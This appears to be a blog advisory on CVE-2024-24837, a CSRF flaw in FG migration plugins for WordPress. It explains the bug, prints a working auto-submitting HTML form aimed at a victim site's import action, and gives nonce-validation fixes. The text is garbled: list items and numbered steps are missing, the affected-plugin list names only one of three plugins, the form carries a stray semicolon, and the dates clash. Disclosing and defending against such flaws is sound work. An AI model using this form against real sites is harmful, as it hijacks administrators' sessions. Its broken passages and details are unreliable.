On January 21, 2024, a security flaw identified as CVE-2024-24837 was discovered in several popular site migration plugins developed by Frédéric GILLES. Specifically, this vulnerability impacts:
FG Joomla to WordPress (all versions up to and including 4.15.)
These plugins help webmasters move content from other website platforms (PrestaShop, Drupal, and Joomla) into WordPress or WooCommerce. CVE-2024-24837 is a Cross-Site Request Forgery (CSRF) vulnerability. In simple terms, it allows an attacker to trick a logged-in admin into unknowingly performing unwanted actions that can harm their site.
Below, we'll explain what CSRF is, break down how this attack works on the affected plugins, show a code example that exploits the bug, and share how you can protect your site.
What is Cross-Site Request Forgery (CSRF)?
CSRF is a security hole that lets a hacker perform actions as another user—usually an admin—without their consent. If you’re logged into your WordPress site and you click a malicious link or visit a tricky web page, CSRF might allow a hacker to:
Even grant themselves extra permissions
Usually, plugins use tokens (called nonces in WordPress) to make sure only real users can send requests. If these tokens are missing or not checked, a hacker has an opportunity.
How Does CVE-2024-24837 Affect FG Plugins?
For all the plugins mentioned, the problem is the import process. None of them properly check for the WordPress nonce on certain admin actions, particularly for starting or restarting a migration. This means that if a logged-in admin visits a dangerous page, that page can start the import process or change plugin settings without their knowledge.
A hacker sends you a link or gets you to visit their web page.
3. Their page contains a hidden form or JavaScript code that sends a request to your site's plugin import page.
4. Because the plugin’s import action doesn’t verify who really made the request, it runs the import or changes settings.
Example: Malicious CSRF Form
This is a simplified exploit that triggers the import process on a site running the FG PrestaShop to WooCommerce plugin:
<!-- Place this code in a malicious page -->
<html>
<body>
<form id="csrf" action="https://victim-site.com/wp-admin/admin.php?page=fg-prestashop-to-woocommerce&action=import"; method="POST">
<input type="hidden" name="step" value="import"/>
<input type="hidden" name="import_button" value="Import"/>
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
If an admin visits this page while logged into their WordPress dashboard, the import starts without their approval!
You can find the latest versions here
- FG PrestaShop to WooCommerce on WordPress.org
- FG Drupal to WordPress on WordPress.org
- FG Joomla to WordPress on WordPress.org
2. Check for Nonce Validation
If you're a developer, always validate the $_POST request with WordPress's check_admin_referer() for sensitive actions.
Correct Example (PHP)
if ( isset($_POST['import_button']) && check_admin_referer('fg_import_action', 'fg_import_nonce') ) {
// safe to process import
}
Don’t stay logged in as an admin on your main browser.
- Use one browser/tab for admin, and another for general browsing.
4. Browser Extensions
- Use browser add-ons like NoScript to block unwanted scripts.
5. Monitor for Suspicious Activity
Watch for unexpected imports or changes, and consider logging admin actions.
References
- WPScan Security Advisory: CVE-2024-24837
- WordPress Codex: Cross-Site Request Forgery (CSRF)
- Frédéric GILLES Plugins Official Site
Conclusion
CVE-2024-24837 is a serious but easy-to-fix vulnerability. If you use any FG migration plugins, update right away! Always be careful about what admin requests your plugins accept—and never trust a form or link that comes from outside your site’s trusted pages.
Stay secure, keep your plugins updated, and always be on guard for these types of web attacks!
Timeline
Published on: 02/21/2024 08:15:46 UTC
Last modified on: 02/22/2024 19:07:27 UTC